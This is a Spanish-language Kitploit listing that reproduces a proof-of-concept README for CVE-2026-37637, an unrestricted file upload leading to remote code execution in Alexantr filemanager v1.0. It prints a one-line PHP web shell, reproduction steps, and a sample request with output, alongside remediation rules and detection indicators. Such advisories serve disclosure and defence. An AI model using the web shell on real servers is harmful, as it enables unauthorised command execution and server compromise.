Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-37637 — Ejecución remota de código en Alexantr filemanager v1.0 mediante carga de archivos sin restricciones | Kitploit
Herramientas/GitHubGitHub/slo-cyber-sec/cve-2026-37637
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y EducaciónDesarrollo de Payloads
GitHubslo-cyber-sec/cve-2026-37637

CVE-2026-37637

Ejecución remota de código en Alexantr filemanager v1.0 mediante carga de archivos sin restricciones

Ver Repositorio
1hace 4 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2026-37637

Prueba de concepto para CVE-2026-37637 - Ejecución remota de código en Alexantr filemanager v1.0 mediante la carga de archivos sin restricciones en filemanager.php.

Resumen

CVE-2026-37637 es una vulnerabilidad de ejecución remota de código que afecta a Alexantr filemanager v1.0.

La vulnerabilidad existe en el componente filemanager.php debido a una validación insuficiente de los archivos cargados. Un atacante remoto puede cargar un archivo PHP malicioso en un directorio accesible desde la web y ejecutar comandos arbitrarios en el servidor.

Estado del CVE: Enviado a MITRE
Investigador: CYBER-SEC Repositorio del proveedor: https://github.com/alexantr/filemanager


Resumen de la vulnerabilidad

ElementoDescripción
ID del CVECVE-2026-37637
Tipo de vulnerabilidadEjecución remota de código
Producto afectadoAlexantr filemanager
Versión afectadav1.0
Componente vulnerablefilemanager.php
Vector de ataqueRemoto
Autenticación requeridaDepende del despliegue/configuración
ImpactoEjecución arbitraria de comandos
Causa raízCarga de archivos sin restricciones y falta de validación de archivos en el servidor

Impacto

Un atacante puede cargar un archivo PHP malicioso a través de la funcionalidad de carga de archivos. Debido a que los archivos cargados se almacenan en una ubicación accesible desde la web y se permite la ejecución de PHP, el atacante puede ejecutar comandos arbitrarios del sistema en el servidor.

Una explotación exitosa puede permitir a un atacante:

  • Ejecutar comandos arbitrarios en el servidor
  • Leer archivos sensibles
  • Modificar o eliminar archivos de la aplicación
  • Cargar malware adicional o webshells
  • Moverse lateralmente dentro del entorno de alojamiento
  • Comprometer por completo el servidor afectado

Detalles técnicos

La aplicación permite a los usuarios cargar archivos arbitrarios sin validar adecuadamente la extensión del archivo, el tipo MIME o el contenido del archivo.

Se puede cargar un archivo PHP malicioso como el siguiente:

root@kitploit:~
<?php system($_GET['cmd']); ?>

Una vez cargado en un directorio accesible desde la web, el atacante puede ejecutar comandos accediendo al archivo a través del navegador y pasando comandos mediante el parámetro cmd.

Ejemplo:

root@kitploit:~
http://target/uploads/shell.php?cmd=id

Esto resulta en la ejecución de comandos en el sistema operativo subyacente.


Pasos para reproducir

1. Clonar la aplicación vulnerable

root@kitploit:~
git clone https://github.com/alexantr/filemanager
cd filemanager

2. Iniciar el servidor de desarrollo de PHP

root@kitploit:~
php -S localhost:8000

3. Acceder a la aplicación

Abra la aplicación en un navegador:

root@kitploit:~
http://localhost:8000/filemanager.php

Dependiendo del despliegue o la configuración, la aplicación también puede ser accesible a través de:

root@kitploit:~
http://localhost:8000/pheditor.php

4. Cargar un archivo PHP malicioso

Cree un archivo llamado shell.php:

root@kitploit:~
<?php system($_GET['cmd']); ?>

Cargue el archivo utilizando la funcionalidad de carga de la aplicación.

5. Ejecutar un comando

Después de cargar el archivo, acceda a él directamente desde el navegador:

root@kitploit:~
http://localhost:8000/uploads/shell.php?cmd=id

Si la explotación es exitosa, el servidor ejecutará el comando y devolverá la salida.

Ejemplo de salida:

root@kitploit:~
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Prueba de concepto

Payload PHP malicioso

root@kitploit:~
<?php system($_GET['cmd']); ?>

Ejemplo de solicitud

root@kitploit:~
GET /uploads/shell.php?cmd=id HTTP/1.1
Host: target
User-Agent: Mozilla/5.0
Connection: close

Resultado esperado

El comando proporcionado a través del parámetro cmd se ejecuta en el servidor.


Causa raíz

La vulnerabilidad es causada por una validación insuficiente en el servidor en la funcionalidad de carga de archivos.

La aplicación no restringe adecuadamente:

  • Extensiones de archivo
  • Tipos MIME
  • Contenido del archivo
  • Destino de la carga
  • Permisos de ejecución dentro del directorio de carga

Como resultado, los archivos PHP ejecutables pueden cargarse y ejecutarse directamente.


Remediación recomendada

El proveedor y los usuarios deben implementar las siguientes protecciones.

1. Bloquear extensiones de archivo peligrosas

Deshabilitar la carga de tipos de archivos ejecutables como:

root@kitploit:~
.php, .phtml, .php3, .php4, .php5, .phar

2. Usar una lista blanca

Solo permitir tipos de archivo esperados, por ejemplo:

root@kitploit:~
.jpg, .png, .gif, .txt, .pdf

3. Validar el tipo MIME y el contenido del archivo

No confiar únicamente en el encabezado Content-Type proporcionado por el cliente.

La validación de archivos debe realizarse en el servidor.

4. Almacenar los archivos cargados fuera de la raíz web

Los archivos cargados no deben ser directamente ejecutables ni accesibles públicamente.

5. Deshabilitar la ejecución de PHP en los directorios de carga

Para Apache, esto se puede hacer con .htaccess:

root@kitploit:~
php_flag engine off
RemoveHandler .php .phtml .php3 .php4 .php5 .phar
RemoveType .php .phtml .php3 .php4 .php5 .phar

Para Nginx, evitar el manejo de PHP en las rutas de carga:

root@kitploit:~
location /uploads/ {
    location ~ \.php$ {
        deny all;
    }
}

6. Renombrar los archivos cargados

Usar nombres de archivo aleatorios generados por el servidor y eliminar las extensiones controladas por el usuario.

7. Aplicar un control de acceso adecuado

Restringir la funcionalidad de carga solo a usuarios de confianza.


Detección

Los administradores pueden buscar archivos PHP sospechosos cargados en directorios accesibles desde la web.

Indicadores de ejemplo:

root@kitploit:~
shell.php
cmd.php
upload.php
backdoor.php
archivos .php dentro de directorios de carga

Los patrones de solicitud sospechosos pueden incluir:

root@kitploit:~
?cmd=
?exec=
?shell=
?command=

Ejemplo de entrada de registro:

root@kitploit:~
GET /uploads/shell.php?cmd=id HTTP/1.1

Aviso legal

Este repositorio se proporciona únicamente con fines educativos y de seguridad defensiva.

La información y la prueba de concepto están destinadas a ayudar a desarrolladores, administradores de sistemas y profesionales de la seguridad a comprender y remediar la vulnerabilidad.

No utilice esta información para atacar sistemas sin autorización explícita. El acceso no autorizado a sistemas informáticos es ilegal.

El autor no es responsable de ningún uso indebido de la información proporcionada en este repositorio.


Referencias

  • https://github.com/alexantr/filemanager
  • https://cve.mitre.org/
Descargar herramienta